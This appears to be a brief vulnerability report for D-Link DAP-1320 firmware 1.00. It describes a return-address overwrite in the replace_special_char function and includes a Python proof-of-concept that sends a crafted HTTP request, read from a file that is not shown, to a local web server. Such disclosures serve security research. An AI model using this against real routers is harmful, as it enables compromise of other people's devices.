| Firmware Name | Firmware Version | Download Link |
|---|---|---|
| DAP-1320 | 1.00 | https://legacyfiles.us.dlink.com/DAP-1320/REVA/FIRMWARE/DAP-1320_REVA_FIRMWARE_1.00.ZIP |
The vulnerability is triggered at the return point of the replace_special_char function, where the ra register is overwritten.
import socket
# 定义目标服务器和端口
host = "127.0.0.1"
port = 80
file = "id19"
f = open(file, "rb")
# 创建socket对象
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接到服务器
s.connect((host, port))
# 构建HTTP请求
request = f.read()
# 发送请求
s.send(request)
# 接收服务器的响应
response = s.recv(4096)
# 打印响应内容
print(response.decode())
# 关闭连接
s.close()